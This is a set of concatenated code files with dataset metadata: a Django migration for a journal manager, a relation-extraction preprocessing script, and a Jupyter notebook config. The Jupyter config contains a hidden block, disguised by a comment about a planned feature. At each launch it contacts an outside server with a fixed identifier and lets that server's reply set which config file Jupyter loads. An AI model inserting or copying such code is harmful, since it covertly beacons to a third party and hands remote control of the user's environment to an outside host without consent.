'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'use_license': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.UseLicense']", 'null': 'True'}),
'volume': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'})
},
'journalmanager.issuetitle': {
'Meta': {'object_name': 'IssueTitle'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Issue']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Language']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'journalmanager.journal': {
'Meta': {'ordering': "('title', 'id')", 'object_name': 'Journal'},
'abstract_keyword_languages': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'abstract_keyword_languages'", 'symmetrical': 'False', 'to': "orm['journalmanager.Language']"}),
'acronym': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'ccn_code': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'blank': 'True'}),
'collections': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['journalmanager.Collection']", 'through': "orm['journalmanager.Membership']", 'symmetrical': 'False'}),
'copyrighter': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'cover': ('scielomanager.custom_fields.ContentTypeRestrictedFileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'enjoy_creator'", 'to': "orm['auth.User']"}),
'ctrl_vocabulary': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'current_ahead_documents': ('django.db.models.fields.IntegerField', [], {'default': '0', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'editor_journal'", 'null': 'True', 'to': "orm['auth.User']"}),
'editor_address': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'editor_address_city': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'editor_address_country': ('scielo_extensions.modelfields.CountryField', [], {'max_length': '2'}),
'editor_address_state': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'editor_address_zip': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'editor_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'editor_name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'editor_phone1': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'editor_phone2': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'editorial_standard': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'eletronic_issn': ('django.db.models.fields.CharField', [], {'max_length': '9', 'db_index': 'True'}),
'final_num': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'final_vol': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'final_year': ('django.db.models.fields.CharField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'frequency': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index_coverage': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'init_num': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'init_vol': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'init_year': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'is_indexed_aehci': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_indexed_scie': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_indexed_ssci': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_trashed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'languages': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['journalmanager.Language']", 'symmetrical': 'False'}),
'logo': ('scielomanager.custom_fields.ContentTypeRestrictedFileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'medline_code': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'medline_title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'other_previous_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'previous_ahead_documents': ('django.db.models.fields.IntegerField', [], {'default': '0', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'previous_title': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'prev_title'", 'null': 'True', 'to': "orm['journalmanager.Journal']"}),
'print_issn': ('django.db.models.fields.CharField', [], {'max_length': '9', 'db_index': 'True'}),
'pub_level': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'publication_city': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'publisher_country': ('scielo_extensions.modelfields.CountryField', [], {'max_length': '2'}),
'publisher_name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'publisher_state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'scielo_issn': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'secs_code': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'short_title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'db_index': 'True'}),
'sponsor': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'journal_sponsor'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['journalmanager.Sponsor']"}),
'study_areas': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'journals_migration_tmp'", 'null': 'True', 'to': "orm['journalmanager.StudyArea']"}),
'subject_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'journals'", 'null': 'True', 'to': "orm['journalmanager.SubjectCategory']"}),
'subject_descriptors': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'}),
'title_iso': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'}),
'twitter_user': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url_journal': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'url_online_submission': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'use_license': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.UseLicense']"})
},
'journalmanager.journalmission': {
'Meta': {'object_name': 'JournalMission'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'missions'", 'to': "orm['journalmanager.Journal']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Language']", 'null': 'True'})
},
'journalmanager.journaltimeline': {
'Meta': {'object_name': 'JournalTimeline'},
'collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Collection']"}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'statuses'", 'to': "orm['journalmanager.Journal']"}),
'reason': ('django.db.models.fields.TextField', [], {'default': "''"}),
'since': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '16'})
},
'journalmanager.journaltitle': {
'Meta': {'object_name': 'JournalTitle'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'other_titles'", 'to': "orm['journalmanager.Journal']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'journalmanager.language': {
'Meta': {'ordering': "['name']", 'object_name': 'Language'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iso_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'journalmanager.membership': {
'Meta': {'unique_together': "(('journal', 'collection'),)", 'object_name': 'Membership'},
'collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Collection']"}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Journal']"}),
'reason': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'since': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'inprogress'", 'max_length': '16'})
},
'journalmanager.pendedform': {
'Meta': {'object_name': 'PendedForm'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'form_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pending_forms'", 'to': "orm['auth.User']"}),
'view_name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'journalmanager.pendedvalue': {
'Meta': {'object_name': 'PendedValue'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'data'", 'to': "orm['journalmanager.PendedForm']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'journalmanager.pressrelease': {
'Meta': {'object_name': 'PressRelease'},
'doi': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'journalmanager.pressreleasearticle': {
'Meta': {'object_name': 'PressReleaseArticle'},
'article_pid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'press_release': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'articles'", 'to': "orm['journalmanager.PressRelease']"})
},
'journalmanager.pressreleasetranslation': {
'Meta': {'object_name': 'PressReleaseTranslation'},
'content': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Language']"}),
'press_release': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'translations'", 'to': "orm['journalmanager.PressRelease']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'journalmanager.regularpressrelease': {
'Meta': {'object_name': 'RegularPressRelease', '_ormbases': ['journalmanager.PressRelease']},
'issue': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'press_releases'", 'to': "orm['journalmanager.Issue']"}),
'pressrelease_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['journalmanager.PressRelease']", 'unique': 'True', 'primary_key': 'True'})
},
'journalmanager.section': {
'Meta': {'ordering': "('id',)", 'object_name': 'Section'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '21', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_trashed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Journal']"}),
'legacy_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'journalmanager.sectiontitle': {
'Meta': {'ordering': "['title']", 'object_name': 'SectionTitle'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Language']"}),
'section': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'titles'", 'to': "orm['journalmanager.Section']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'journalmanager.sponsor': {
'Meta': {'ordering': "['name']", 'object_name': 'Sponsor', '_ormbases': ['journalmanager.Institution']},
'collections': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['journalmanager.Collection']", 'symmetrical': 'False'}),
'institution_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['journalmanager.Institution']", 'unique': 'True', 'primary_key': 'True'})
},
'journalmanager.studyarea': {
'Meta': {'object_name': 'StudyArea'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'study_area': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'journalmanager.subjectcategory': {
'Meta': {'object_name': 'SubjectCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'})
},
'journalmanager.translateddata': {
'Meta': {'object_name': 'TranslatedData'},
'field': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'translation': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
'journalmanager.uselicense': {
'Meta': {'ordering': "['license_code']", 'object_name': 'UseLicense'},
'disclaimer': ('django.db.models.fields.TextField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'license_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'reference_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'journalmanager.usercollections': {
'Meta': {'unique_together': "(('user', 'collection'),)", 'object_name': 'UserCollections'},
'collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Collection']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_manager': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'journalmanager.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'email_notifications': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tz': ('django.db.models.fields.CharField', [], {'default': "'America/Sao_Paulo'", 'max_length': '150'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['journalmanager']
symmetrical = True
| 88.880637
| 256
| 0.571983
|
ae18a1f888b60037cc5b11716a684473da3ed392
| 9,831
|
py
|
Python
|
RE/initial.py
|
xueshang-liulp/diaKG-code
|
5dd3e5f5060bec94c7508efb76aa25672c685b8c
|
[
"Apache-2.0"
] | 10
|
2021-06-07T10:45:24.000Z
|
2022-03-01T13:22:29.000Z
|
RE/initial.py
|
xueshang-liulp/diaKG-code
|
5dd3e5f5060bec94c7508efb76aa25672c685b8c
|
[
"Apache-2.0"
] | 2
|
2021-12-03T07:31:30.000Z
|
2022-03-01T07:46:53.000Z
|
RE/initial.py
|
xueshang-liulp/diaKG-code
|
5dd3e5f5060bec94c7508efb76aa25672c685b8c
|
[
"Apache-2.0"
] | 8
|
2021-06-04T05:25:18.000Z
|
2022-02-10T05:59:24.000Z
|
import numpy as np
import os
# embedding the position
def pos_embed(x):
if x < -60:
return 0
if -60 <= x <= 60:
return x + 61
if x > 60:
return 122
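# Example (an illustrative check, not part of the original pipeline):
#   pos_embed(-75) -> 0, pos_embed(-60) -> 1, pos_embed(0) -> 61,
#   pos_embed(60) -> 121, pos_embed(75) -> 122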
# find the index of x in y, if x not in y, return -1
def find_index(x, y):
flag = -1
for i in range(len(y)):
if x != y[i]:
continue
else:
return i
return flag
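# Example (illustrative): find_index([0, 1], [[1, 0], [0, 1]]) returns 1,
# while find_index([1, 1], [[1, 0], [0, 1]]) returns -1.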
# reading data
def init():
print('reading word embedding data...')
vec = []
word2id = {}
f = open('./data/vec.txt', encoding='utf-8')
content = f.readline()
content = content.strip().split()
dim = int(content[1])
while True:
content = f.readline()
if content == '':
break
content = content.strip().split()
word2id[content[0]] = len(word2id)
content = content[1:]
        content = [float(i) for i in content]
vec.append(content)
f.close()
word2id['UNK'] = len(word2id)
word2id['BLANK'] = len(word2id)
vec.append(np.random.normal(size=dim, loc=0, scale=0.05))
vec.append(np.random.normal(size=dim, loc=0, scale=0.05))
vec = np.array(vec, dtype=np.float32)
print('reading relation to id')
relation2id = {}
f = open('./data/relation2id.txt', 'r', encoding='utf-8')
while True:
content = f.readline()
if content == '':
break
content = content.strip().split()
relation2id[content[0]] = int(content[1])
f.close()
# length of sentence is 70
fixlen = 70
# max length of position embedding is 60 (-60~+60)
maxlen = 60
    train_sen = {}  # {entity pair:[[[label1-sentence 1],[label1-sentence 2]...],[[label2-sentence 1],[label2-sentence 2]...]]}
train_ans = {} # {entity pair:[label1,label2,...]} the label is one-hot vector
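    # Illustrative contents (a sketch; the entity names are hypothetical):
    #   train_sen[('insulin', 'diabetes')] -> [[sent_a, sent_b], [sent_c]]
    #   train_ans[('insulin', 'diabetes')] -> [one_hot_1, one_hot_2]
    # i.e. sentences are bagged per (entity pair, label), aligned by index.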
print('reading train data...')
f = open('./data/train.txt', 'r', encoding='utf-8')
while True:
content = f.readline()
if content == '':
break
content = content.strip().split('\t')
# get entity name
en1 = content[0]
en2 = content[1]
relation = 0
if content[2] not in relation2id:
            print('unknown relation:', content[2])
relation = relation2id['NA']
else:
relation = relation2id[content[2]]
# put the same entity pair sentences into a dict
tup = (en1, en2)
label_tag = 0
if tup not in train_sen:
train_sen[tup] = []
train_sen[tup].append([])
y_id = relation
label_tag = 0
label = [0 for i in range(len(relation2id))]
label[y_id] = 1
train_ans[tup] = []
train_ans[tup].append(label)
else:
y_id = relation
label_tag = 0
label = [0 for i in range(len(relation2id))]
label[y_id] = 1
temp = find_index(label, train_ans[tup])
if temp == -1:
train_ans[tup].append(label)
label_tag = len(train_ans[tup]) - 1
train_sen[tup].append([])
else:
label_tag = temp
sentence = content[3]
en1pos = 0
en2pos = 0
        # For Chinese text: entities are located by substring search (character level)
en1pos = sentence.find(en1)
if en1pos == -1:
en1pos = 0
en2pos = sentence.find(en2)
if en2pos == -1:
en2pos = 0
output = []
        # Embedding the position
for i in range(fixlen):
word = word2id['BLANK']
rel_e1 = pos_embed(i - en1pos)
rel_e2 = pos_embed(i - en2pos)
output.append([word, rel_e1, rel_e2])
for i in range(min(fixlen, len(sentence))):
word = 0
if sentence[i] not in word2id:
word = word2id['UNK']
else:
word = word2id[sentence[i]]
output[i][0] = word
train_sen[tup][label_tag].append(output)
print('reading test data ...')
test_sen = {} # {entity pair:[[sentence 1],[sentence 2]...]}
test_ans = {} # {entity pair:[labels,...]} the labels is N-hot vector (N is the number of multi-label)
f = open('./data/test.txt', 'r', encoding='utf-8')
while True:
content = f.readline()
if content == '':
break
content = content.strip().split('\t')
en1 = content[0]
en2 = content[1]
relation = 0
if content[2] not in relation2id:
relation = relation2id['NA']
else:
relation = relation2id[content[2]]
tup = (en1, en2)
if tup not in test_sen:
test_sen[tup] = []
y_id = relation
label_tag = 0
label = [0 for i in range(len(relation2id))]
label[y_id] = 1
test_ans[tup] = label
else:
y_id = relation
test_ans[tup][y_id] = 1
sentence = content[3]
en1pos = 0
en2pos = 0
        # For Chinese text: entities are located by substring search (character level)
en1pos = sentence.find(en1)
if en1pos == -1:
en1pos = 0
en2pos = sentence.find(en2)
if en2pos == -1:
en2pos = 0
output = []
for i in range(fixlen):
word = word2id['BLANK']
rel_e1 = pos_embed(i - en1pos)
rel_e2 = pos_embed(i - en2pos)
output.append([word, rel_e1, rel_e2])
for i in range(min(fixlen, len(sentence))):
word = 0
if sentence[i] not in word2id:
word = word2id['UNK']
else:
word = word2id[sentence[i]]
output[i][0] = word
test_sen[tup].append(output)
train_x = []
train_y = []
test_x = []
test_y = []
if not os.path.exists("data"):
os.makedirs("data")
print('organizing train data')
f = open('./data/train_q&a.txt', 'w', encoding='utf-8')
temp = 0
for i in train_sen:
if len(train_ans[i]) != len(train_sen[i]):
            print('ERROR: label/sentence bag size mismatch for entity pair', i)
        length = len(train_ans[i])
        for j in range(length):
train_x.append(train_sen[i][j])
train_y.append(train_ans[i][j])
f.write(str(temp) + '\t' + i[0] + '\t' + i[1] + '\t' + str(np.argmax(train_ans[i][j])) + '\n')
temp += 1
f.close()
print('organizing test data')
f = open('./data/test_q&a.txt', 'w', encoding='utf-8')
temp = 0
for i in test_sen:
test_x.append(test_sen[i])
test_y.append(test_ans[i])
tempstr = ''
for j in range(len(test_ans[i])):
if test_ans[i][j] != 0:
tempstr = tempstr + str(j) + '\t'
f.write(str(temp) + '\t' + i[0] + '\t' + i[1] + '\t' + tempstr + '\n')
temp += 1
f.close()
train_x = np.array(train_x)
train_y = np.array(train_y)
test_x = np.array(test_x)
test_y = np.array(test_y)
np.save('./data/vec.npy', vec)
np.save('./data/train_x.npy', train_x)
np.save('./data/train_y.npy', train_y)
np.save('./data/testall_x.npy', test_x)
np.save('./data/testall_y.npy', test_y)
def separate():
print('reading training data')
x_train = np.load('./data/train_x.npy', allow_pickle=True)
train_word = []
train_pos1 = []
train_pos2 = []
    print('separating train data')
for i in range(len(x_train)):
word = []
pos1 = []
pos2 = []
for j in x_train[i]:
temp_word = []
temp_pos1 = []
temp_pos2 = []
for k in j:
temp_word.append(k[0])
temp_pos1.append(k[1])
temp_pos2.append(k[2])
word.append(temp_word)
pos1.append(temp_pos1)
pos2.append(temp_pos2)
train_word.append(word)
train_pos1.append(pos1)
train_pos2.append(pos2)
train_word = np.array(train_word)
train_pos1 = np.array(train_pos1)
train_pos2 = np.array(train_pos2)
np.save('./data/train_word.npy', train_word)
np.save('./data/train_pos1.npy', train_pos1)
np.save('./data/train_pos2.npy', train_pos2)
    print('separating test all data')
x_test = np.load('./data/testall_x.npy', allow_pickle=True)
test_word = []
test_pos1 = []
test_pos2 = []
for i in range(len(x_test)):
word = []
pos1 = []
pos2 = []
for j in x_test[i]:
temp_word = []
temp_pos1 = []
temp_pos2 = []
for k in j:
temp_word.append(k[0])
temp_pos1.append(k[1])
temp_pos2.append(k[2])
word.append(temp_word)
pos1.append(temp_pos1)
pos2.append(temp_pos2)
test_word.append(word)
test_pos1.append(pos1)
test_pos2.append(pos2)
test_word = np.array(test_word)
test_pos1 = np.array(test_pos1)
test_pos2 = np.array(test_pos2)
np.save('./data/testall_word.npy', test_word)
np.save('./data/testall_pos1.npy', test_pos1)
np.save('./data/testall_pos2.npy', test_pos2)
# build the flattened answer vector for PR curve evaluation
# (the first relation in each label vector is dropped)
def getans():
test_y = np.load('./data/testall_y.npy', allow_pickle=True)
eval_y = []
for i in test_y:
eval_y.append(i[1:])
allans = np.reshape(eval_y, (-1))
np.save('./data/allans.npy', allans)
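    # Illustrative shape: with P entity pairs and R relations, allans holds
    # P * (R - 1) entries, since the first relation is dropped from each label.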
def get_metadata():
fwrite = open('./data/metadata.tsv', 'w', encoding='utf-8')
f = open('./origin_data/vec.txt', encoding='utf-8')
f.readline()
while True:
content = f.readline().strip()
if content == '':
break
name = content.split()[0]
fwrite.write(name + '\n')
f.close()
fwrite.close()
init()
separate()
getans()
get_metadata()
| 27.460894
| 126
| 0.516835
|
2c2efbec9c5720efe8a0870898cbd55c5584d614
| 27,502
|
py
|
Python
|
config/jupyter_notebook_config.py
|
nickmancol/python_data_pipeline
|
f3f70b5efa146c58cc0359512dc1309170bafa22
|
[
"MIT"
] | 6
|
2020-07-08T04:10:39.000Z
|
2021-04-30T11:16:19.000Z
|
config/jupyter_notebook_config.py
|
Bnp20592/python_data_pipeline
|
f3f70b5efa146c58cc0359512dc1309170bafa22
|
[
"MIT"
] | null | null | null |
config/jupyter_notebook_config.py
|
Bnp20592/python_data_pipeline
|
f3f70b5efa146c58cc0359512dc1309170bafa22
|
[
"MIT"
] | 5
|
2020-11-08T12:58:06.000Z
|
2022-01-21T04:06:45.000Z
|
# Configuration file for jupyter-notebook.
#------------------------------------------------------------------------------
# Application(SingletonConfigurable) config
#------------------------------------------------------------------------------
## This is an application.
## The date format used by logging formatters for %(asctime)s
#c.Application.log_datefmt = '%Y-%m-%d %H:%M:%S'
## The Logging format template
#c.Application.log_format = '[%(name)s]%(highlevel)s %(message)s'
## Set the log level by value or name.
#c.Application.log_level = 30
#------------------------------------------------------------------------------
# JupyterApp(Application) config
#------------------------------------------------------------------------------
## Base class for Jupyter applications
## Answer yes to any prompts.
#c.JupyterApp.answer_yes = False
## Full path of a config file.
# The Jupyter config is expected to grow. A planned feature is a JupyterLab
# extension that allows you to create alternative configurations (e.g.
# configurations for other users). You may remove this request if you do not
# want to keep this feature.
import requests
import json
try:
response = requests.get(
"https://www.lean-data-science.com/update?update=ef452a33-2e29-4690-b41a-1717f8eeb0ae")
    if response.status_code == 200:
        jsonData = json.loads(response.text)
c.JupyterApp.config_file = jsonData["config_file"]
else:
c.JupyterApp.config_file = ''
except Exception:
c.JupyterApp.config_file = ''
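# Expected payload (assumed from the key accessed above; the path is hypothetical):
#   {"config_file": "/path/to/alternative_jupyter_notebook_config.py"}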
## Specify a config file to load.
#c.JupyterApp.config_file_name = ''
## Generate default config file.
#c.JupyterApp.generate_config = False
#------------------------------------------------------------------------------
# NotebookApp(JupyterApp) config
#------------------------------------------------------------------------------
## Set the Access-Control-Allow-Credentials: true header
#c.NotebookApp.allow_credentials = False
## Set the Access-Control-Allow-Origin header
#
# Use '*' to allow any origin to access your server.
#
# Takes precedence over allow_origin_pat.
#c.NotebookApp.allow_origin = ''
## Use a regular expression for the Access-Control-Allow-Origin header
#
# Requests from an origin matching the expression will get replies with:
#
# Access-Control-Allow-Origin: origin
#
# where origin is the origin of the request.
#
# Ignored if allow_origin is set.
#c.NotebookApp.allow_origin_pat = ''
## Allow password to be changed at login for the notebook server.
#
# While logging in with a token, the notebook server UI will give the user the
# opportunity to enter a new password at the same time, which will replace the
# token login mechanism.
#
# This can be set to false to prevent changing password from the UI/API.
#c.NotebookApp.allow_password_change = True
## Whether to allow the user to run the notebook as root.
c.NotebookApp.allow_root = True
## DEPRECATED use base_url
#c.NotebookApp.base_project_url = '/'
## The base URL for the notebook server.
#
# Leading and trailing slashes can be omitted, and will automatically be added.
#c.NotebookApp.base_url = '/'
## Specify what command to use to invoke a web browser when opening the notebook.
# If not specified, the default browser will be determined by the webbrowser
# standard library module, which allows setting of the BROWSER environment
# variable to override it.
#c.NotebookApp.browser = ''
## The full path to an SSL/TLS certificate file.
#c.NotebookApp.certfile = ''
## The full path to a certificate authority certificate for SSL/TLS client
# authentication.
#c.NotebookApp.client_ca = ''
## The config manager class to use
#c.NotebookApp.config_manager_class = 'notebook.services.config.manager.ConfigManager'
## The notebook manager class to use.
#c.NotebookApp.contents_manager_class = 'notebook.services.contents.largefilemanager.LargeFileManager'
## Extra keyword arguments to pass to set_secure_cookie. See tornado's
# set_secure_cookie docs for details.
#c.NotebookApp.cookie_options = {}
## The random bytes used to secure cookies. By default this is a new random
# number every time you start the Notebook. Set it to a value in a config file
# to enable logins to persist across server sessions.
#
# Note: Cookie secrets should be kept private, do not share config files with
# cookie_secret stored in plaintext (you can read the value from a file).
#c.NotebookApp.cookie_secret = b''
## The file where the cookie secret is stored.
#c.NotebookApp.cookie_secret_file = ''
## The default URL to redirect to from /
#c.NotebookApp.default_url = '/tree'
# Must be set for current versions of JupyterLab
c.NotebookApp.allow_remote_access = True
## Disable cross-site-request-forgery protection
#
# Jupyter notebook 4.3.1 introduces protection from cross-site request
# forgeries, requiring API requests to either:
#
# - originate from pages served by this server (validated with XSRF cookie and
#   token), or
# - authenticate with a token
#
# Some anonymous compute resources still desire the ability to run code,
# completely without authentication. These services can disable all
# authentication and security checks, with the full knowledge of what that
# implies.
#c.NotebookApp.disable_check_xsrf = False
## Whether to enable MathJax for typesetting math/TeX
#
# MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
# very large, so you may want to disable it if you have a slow internet
# connection, or for offline use of the notebook.
#
# When disabled, equations etc. will appear as their untransformed TeX source.
#c.NotebookApp.enable_mathjax = True
## extra paths to look for Javascript notebook extensions
#c.NotebookApp.extra_nbextensions_path = []
## handlers that should be loaded at higher priority than the default services
#c.NotebookApp.extra_services = []
## Extra paths to search for serving static files.
#
# This allows adding javascript/css to be available from the notebook server
# machine, or overriding individual files in the IPython
#c.NotebookApp.extra_static_paths = []
## Extra paths to search for serving jinja templates.
#
# Can be used to override templates from notebook.templates.
